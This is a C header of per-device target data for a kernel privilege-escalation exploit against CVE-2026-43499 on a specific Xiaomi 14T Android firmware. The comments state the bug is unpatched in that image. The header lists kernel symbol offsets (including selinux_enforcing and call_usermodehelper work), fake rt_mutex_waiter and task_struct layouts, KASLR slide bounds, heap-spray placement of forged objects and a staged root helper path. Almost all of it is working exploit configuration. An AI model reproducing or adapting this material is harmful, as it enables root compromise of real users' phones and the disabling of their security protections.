#ifndef TARGET_H
#define TARGET_H

/* Xiaomi XIG07 (au/KDDI Xiaomi 14T), MediaTek MT6897 / Dimensity 8300-Ultra
 *
 *   kernel 6.1.138-android14-11-g44bda9e8f6e9-ab13792638  (GKI, 4K pages)
 *   build  Xiaomi/XIG07_jp_kdi/XIG07:16/BP2A.250605.031.A3/
 *          OS3.0.7.0.WNEJPKD:user/release-keys
 *
 * The bug is unfixed in this image. remove_waiter() is out of line at image
 * offset 0x01005e5c and operates on `current` rather than on waiter->task --
 *
 *     mrs x20, SP_EL0
 *     add x22, x20, #0x924        ; current->pi_lock
 *     str xzr, [x20, #0x950]      ; current->pi_blocked_on = NULL
 *
 * -- and rt_mutex_start_proxy_lock+0x44 calls it on the failure path. That is
 * the unfixed shape of CVE-2026-43499. The same disassembly re-confirms
 * FAKE_TASK_PI_LOCK_OFF, FAKE_TASK_PI_WAITERS_OFF and
 * FAKE_TASK_PI_BLOCKED_ON_OFF below, and task_blocks_on_rt_mutex's stores
 * re-confirm the whole waiter layout: `stp x20, x19, [x21, #0x30]` is
 * task/lock, `str w8, [x21, #0x44]` prio, `str x9, [x21, #0x48]` deadline.
 *
 * This kernel has the pre-split rt_mutex_waiter -- one prio/deadline pair,
 * 0x58 bytes -- which is COMPACT_RT_MUTEX_WAITER below. It is *not* the shape
 * the core's other android14-6.1 targets have: the rt_waiter_node split
 * reached 6.1 later than this sublevel, so a header copied from one of those
 * would build a fake waiter the kernel reads at the wrong offsets.
 */

#if defined(APP_PAYLOAD) && APP_PAYLOAD
#define BUILD_VARIANT_LABEL "xig07-OS3.0.7.0.WNEJPKD-app"
#else
#define BUILD_VARIANT_LABEL "xig07-OS3.0.7.0.WNEJPKD-root-umh"
#endif

#ifndef BUILD_FINGERPRINT
#define BUILD_FINGERPRINT \
  "Xiaomi/XIG07_jp_kdi/XIG07:16/BP2A.250605.031.A3/" \
  "OS3.0.7.0.WNEJPKD:user/release-keys"
#endif

/* --------------------------------------------------------- generated ---
 * Everything between these markers is the output of the port's own
 * extractor, run against this build's boot.img. Regenerate it rather than
 * editing a number inside it.
 */
/* Generated by docs/tools/extract_xig07.py from the device's own
 * boot.img -- do not hand-edit a value in this block, regenerate it.
 */
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x40000000ULL
#ifndef P0_KERNEL_PHYS_LOAD
#define P0_KERNEL_PHYS_LOAD 0x40000000ULL
#endif

#define COMPACT_RT_MUTEX_WAITER 1

#define SLIDE_TRACEFS_EVENT_ID 106
#define SLIDE_TRACEFS_WORKER_CALLER_OFF 0x000da4acULL

#define ASHMEM_FOPS_OFF 0x0126d1b8ULL
#define ASHMEM_IOCTL_OFF 0x00c2d0a4ULL
#define ASHMEM_COMPAT_IOCTL_OFF 0x00c2d9dcULL
#define ASHMEM_MMAP_OFF 0x00c2da34ULL
#define ASHMEM_OPEN_OFF 0x00c2dc54ULL
#define ASHMEM_RELEASE_OFF 0x00c2dcdcULL
#define ASHMEM_SHOW_FDINFO_OFF 0x00c2ddfcULL
#define CONFIGFS_READ_ITER_OFF 0x004612f4ULL
#define CONFIGFS_BIN_WRITE_ITER_OFF 0x00461824ULL
#define COPY_SPLICE_READ_OFF 0x003e3828ULL
#define NOOP_LLSEEK_OFF 0x00396000ULL
#define INIT_TASK_OFF 0x01fef600ULL
#define ROOT_TASK_GROUP_OFF 0x021d7580ULL
#define KMALLOC_CACHES_OFF 0x015b6118ULL
#define ANON_PIPE_BUF_OPS_OFF 0x010f6b50ULL
#define CALL_USERMODEHELPER_EXEC_WORK_OFF 0x000d2d08ULL
#define SYSTEM_UNBOUND_WQ_OFF 0x01fdae60ULL
#define ASHMEM_MISC_FOPS_OFF 0x0214be40ULL
#define SELINUX_ENFORCING_OFF 0x022293d0ULL

#define SLIDE_NFULNL_LOGGER_OBJECT_OFF 0x01fe29c8ULL
#define SLIDE_NFULNL_LOGGER_NAME_OFF 0x015112dcULL
#define SLIDE_RANDOM_TABLE_BOOT_ID_DATA_PTR_OFF 0x021073c8ULL
#define SLIDE_SYSCTL_BOOTID_OFF 0x0224a458ULL

#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x18
#define FAKE_WAITER_TASK_OFF 0x30
#define FAKE_WAITER_LOCK_OFF 0x38
#define FAKE_WAITER_WAKE_STATE_OFF 0x40
#define FAKE_WAITER_PRIO_OFF 0x44
#define FAKE_WAITER_DEADLINE_OFF 0x48
#define FAKE_WAITER_WW_CTX_OFF 0x50
#define FAKE_WAITER_LAYOUT_SIZE 0x58

#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
#define FAKE_TASK_TASK_GROUP_OFF 0x348
#define FAKE_TASK_PI_LOCK_OFF 0x924
#define FAKE_TASK_PI_WAITERS_OFF 0x938
#define FAKE_TASK_PI_TOP_TASK_OFF 0x948
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x950
#define CFG_PAGE_OFF 0x10
#define CFG_NEEDS_READ_FILL_OFF 0x50
#define CFG_BIN_BUFFER_OFF 0x58
#define CFG_BIN_BUFFER_SIZE_OFF 0x60
#define CFG_CB_MAX_SIZE_OFF 0x64
#define WQ_DFL_PWQ_OFF 0xb0
#define PWQ_POOL_OFF 0x00
#define PWQ_WQ_OFF 0x08
#define PWQ_WORK_COLOR_OFF 0x10
#define PWQ_REFCNT_OFF 0x18
#define PWQ_NR_IN_FLIGHT_OFF 0x1c
#define PWQ_NR_ACTIVE_OFF 0x5c
#define PWQ_MAX_ACTIVE_OFF 0x60
#define POOL_WORKLIST_OFF 0x28
#define POOL_NR_IDLE_OFF 0x3c
#define WORK_DATA_OFF 0x00
#define WORK_ENTRY_OFF 0x08
#define WORK_FUNC_OFF 0x18
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF 0x18
#define STRUCT_PAGE_TYPE_OFF 0x30
#define STRUCT_PAGE_SIZE 0x40

#define FOPS_OWNER_OFF 0x00
#define FOPS_LLSEEK_OFF 0x08
#define FOPS_READ_OFF 0x10
#define FOPS_WRITE_OFF 0x18
#define FOPS_READ_ITER_OFF 0x20
#define FOPS_WRITE_ITER_OFF 0x28
#define FOPS_IOCTL_OFF 0x50
#define FOPS_COMPAT_IOCTL_OFF 0x58
#define FOPS_MMAP_OFF 0x60
#define FOPS_OPEN_OFF 0x70
#define FOPS_RELEASE_OFF 0x80
#define FOPS_SPLICE_READ_OFF 0xc8
#define FOPS_SHOW_FDINFO_OFF 0xe0
/* ----------------------------------------------------- end generated ---
 *
 * P0_PHYS_OFFSET is memstart_addr, read off the running device as the Normal
 * zone's start_pfn (262144 -> 0x40000000) rather than guessed; the DRAM base
 * is already 1 GiB aligned, so the round down in arm64_memblock_init() does
 * not move it.
 *
 * P0_KERNEL_PHYS_LOAD is where lk puts the Image, which is in neither
 * boot.img nor lk.img -- it comes from the preloader's mblock table, and no
 * XIG07 preloader was to hand. It is set equal to the DRAM base, i.e. delta
 * zero, which is what every MediaTek port measured (MT6991, MT6993, and the
 * MT6897 reference on this same 6.1.138 kernel). Only the delta reaches the
 * payload, through P0_DATA_ALIAS_CONST(), so the two absolute values cancel
 * and it is the delta that has to be right. The #ifndef is so a device that
 * disagrees can be answered with -DP0_KERNEL_PHYS_LOAD=0x... rather than an
 * edit here.
 *
 * A static P0_PHYS_OFFSET is sound on this configuration: the 1 GiB shift
 * arm64_memblock_init() can apply from memstart_offset_seed is guarded by
 * `linear_region_size - BIT(parange) >= ARM64_MEMSTART_ALIGN`, which is
 * negative at VA_BITS=39, so the randomisation never fires whatever the seed.
 */

#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END 0xffffff9000000000ULL
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END 0xffffff9000000000ULL
#define VMEMMAP_START 0xfffffffe00000000ULL

/* Where the sprayed payload starts relative to the leaked page. A property of
 * the skb allocation rather than of this firmware, and the same -0xe80 on
 * every android14-6.1 target the core has run on. */
#define SKB_DATA_DELTA (-0xe80LL)

#define SLIDE_FAKE_WAITER_PRIO 0
#define SLIDE_WAITER_WAKE_STATE 0
#define SLIDE_LOCK_OWNER_VALUE 1ULL
#define SLIDE_USE_FAKE_TASK 1
#define SLIDE_RB_PARENT_TYPE_RESTORE 1ULL

/* This device runs arm64 KASLR off a bootloader seed, so the kworker caller
 * the leak reads sits gigabytes from its link address rather than the sub-2 MiB
 * the core's other targets see. The window is exactly what kaslr_early_init()
 * can return -- BIT(VA_BITS_MIN - 3) + (seed & mask), mask cleared below
 * MIN_KIMG_ALIGN, at VA_BITS_MIN 39 -- and the alignment is MIN_KIMG_ALIGN.
 * Measured on the device: 0x22e5600000, 2 MiB aligned, and every other
 * sched_blocked_reason caller in the same capture unslid by it resolves to a
 * real function (worker_thread+0xa0, rcu_gp_fqs_loop+0x1e0, msleep+0x2c).
 *
 * SLIDE_P0_TRACKS_KASLR 0 because that offset moves the image's virtual
 * mapping only: the linear map is built from memblock and the physmap alias of
 * an image symbol does not follow it, so data_addr() takes no correction. The
 * MT6897 reference port on this same kernel has no such term at all.
 */
#define SLIDE_KASLR_MIN 0x1000000000ULL
#define SLIDE_KASLR_MAX 0x2fffe00000ULL
#define SLIDE_KASLR_ALIGN 0x200000ULL
#define SLIDE_P0_TRACKS_KASLR 0

/* How many 64-bit words of core_sys_select's stack_fds[] precede word zero of
 * the freed rt_mutex_waiter. Both syscalls are entered from invoke_syscall at
 * the same SP, so it is the difference between how far each buries its own
 * local, read off this image:
 *
 *   __arm64_sys_futex 0x70 + do_futex 0x60 + futex_wait_requeue_pi 0x1b0,
 *     rt_waiter at sp+0x98         -> 0x1e8 below the entry SP
 *   __arm64_sys_pselect6 0x90 + core_sys_select 0x1c0,
 *     stack_fds at sp+0x50        -> 0x200 below it
 *
 *   (0x200 - 0x1e8) / 8 = 3
 *
 * rt_waiter's offset is the argument rt_mutex_wait_proxy_lock() and
 * rt_mutex_cleanup_proxy_lock() are both given; stack_fds' is the `add x23,
 * sp, #0x50` the size check falls through to, and the 0x100 bytes the
 * prologue zeroes from there are its SELECT_STACK_ALLOC.
 */
#define SLIDE_PSELECT_WORD_SHIFT 3

#define ASHMEM_MISC_FOPS (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
#define ASHMEM_FOPS (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
#define ASHMEM_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
#define CONFIGFS_READ_ITER (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define COPY_SPLICE_READ (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define NOOP_LLSEEK (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define KMALLOC_CACHES (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)
#define CALL_USERMODEHELPER_EXEC_WORK \
  (KIMAGE_TEXT_BASE + CALL_USERMODEHELPER_EXEC_WORK_OFF)
#define SYSTEM_UNBOUND_WQ (KIMAGE_TEXT_BASE + SYSTEM_UNBOUND_WQ_OFF)

#define SLIDE_INIT_TASK_OFF INIT_TASK_OFF
#define SLIDE_ROOT_TASK_GROUP_OFF ROOT_TASK_GROUP_OFF
#define SLIDE_NFULNL_LOGGER_NAME_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_NAME_OFF)
#define SLIDE_NFULNL_LOGGER_OBJECT_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OBJECT_OFF)
#define SLIDE_RANDOM_TABLE_BOOT_ID_DATA_PTR_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_RANDOM_TABLE_BOOT_ID_DATA_PTR_OFF)
#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

/* Where each faked object sits inside the reclaimed order-3 page. Layout of
 * the payload the exploit sprays, not of anything in the kernel. */
#define LOCK_OFF 0x2210
#define W0_OFF 0x2350
#define FOPS_OFF 0x2000
#define SCRATCH_OFF 0x3000
#define RIGHT_OFF 0x4440
#define LEFT_OFF 0x5550
#define FAKE_TASK_OFF 0x3200

#define PIPE_BUFFER_SLOTS 32
#define PIPE_BUF_FLAG_CAN_MERGE 0x10

/* ------------------------------------------------------- deployment ---
 * Not about the kernel: where the bring-up run stages the bootstrap helper,
 * and where in the reclaimed page the usermodehelper work item is built.
 */
#define ROOT_UMH_PATH "/data/local/tmp/cve-2026-43499-root"
#define ROOT_UMH_WORK_OFF 0x6000
#define ROOT_UMH_DATA_OFF 0x6200

#endif
